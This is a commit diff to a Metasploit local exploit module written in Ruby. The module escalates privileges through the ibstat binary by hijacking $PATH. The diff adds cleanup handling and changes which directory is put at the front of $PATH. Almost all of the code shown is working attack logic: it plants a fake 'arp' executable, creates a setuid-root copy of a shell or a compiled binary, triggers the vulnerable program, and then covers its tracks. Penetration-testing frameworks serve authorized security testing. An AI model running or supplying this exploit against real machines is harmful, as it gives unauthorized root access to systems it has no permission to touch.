Fix $PATH issues. Add FileDropper functionality
parent
e6c1dd3f9e
commit
a005d69b16
|
@ -7,6 +7,7 @@ class Metasploit4 < Msf::Exploit::Local
|
|||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Post::File
|
||||
include Msf::Exploit::FileDropper
|
||||
|
||||
def initialize(info={})
|
||||
super( update_info( info,
|
||||
|
@ -90,23 +91,23 @@ chmod 4555 #{root_file}
|
|||
print_status("Compiling source...")
|
||||
cmd_exec "gcc -o #{root_file} #{root_file}.c"
|
||||
print_status("Compilation completed")
|
||||
print_status("Deleting source...")
|
||||
file_rm("#{root_file}.c")
|
||||
register_file_for_cleanup("#{root_file}.c")
|
||||
else
|
||||
cmd_exec "cp /bin/sh #{root_file}"
|
||||
end
|
||||
print_status("Writing custom arp file...")
|
||||
write_file("#{arp_file}",arp)
|
||||
register_file_for_cleanup("#{arp_file}")
|
||||
cmd_exec "chmod 0555 #{arp_file}"
|
||||
print_status("Custom arp file written")
|
||||
print_status("Updating $PATH environment variable...")
|
||||
path_env = cmd_exec 'echo $PATH'
|
||||
cmd_exec 'PATH=.:$PATH'
|
||||
cmd_exec "PATH=#{datastore["WritableDir"]}:$PATH"
|
||||
cmd_exec 'export PATH'
|
||||
print_status("Triggering vulnerablity...")
|
||||
cmd_exec '/usr/bin/ibstat -a -i en0 2>/dev/null >/dev/null'
|
||||
print_status("Removing custom arp...")
|
||||
file_rm("#{arp_file}")
|
||||
# The $PATH variable must be restored before the payload is executed
|
||||
# in cases where an euid root shell was gained
|
||||
print_status('Restoring $PATH environment variable...')
|
||||
cmd_exec "PATH=#{path_env}"
|
||||
cmd_exec 'export PATH'
|
||||
|
|
Loading…
Reference in New Issue